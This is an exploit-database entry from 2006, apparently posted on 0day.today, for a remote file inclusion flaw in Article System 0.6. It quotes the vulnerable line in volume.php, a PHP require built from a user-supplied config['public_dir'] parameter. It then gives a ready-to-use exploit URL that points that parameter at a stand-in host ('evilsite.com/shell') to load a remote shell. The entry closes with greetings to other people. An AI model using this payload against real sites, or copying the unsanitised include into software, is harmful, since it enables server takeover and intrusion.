Article System 0.6 (volume.php) Remote File Include Vulnerability

2006-11-02T00:00:00
ID 1337DAY-ID-1104
Type zdt
Reporter GregStar
Modified 2006-11-02T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Article System 0.6 (volume.php) Remote File Include Vulnerability
=================================================================



**********************************************************************************************************
                                                              
			                Coding 4 Fun (c4f.pl) 
			                                      
**********************************************************************************************************

* Article System 0.6 ; 

* Class = Remote File Inclusion ;
 

* Found by = GregStar (gregstar[at]c4f[dot]pl) ;

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code in volume.php:

 require "{$config['public_dir']}/templates/html/volume.php" ;


- Exploit:

http://[target]/[path]/volume.php?config[public_dir]=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------


Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,[email protected] and for all friends.



**************************************************************************************************************



#  0day.today [2018-04-12]  #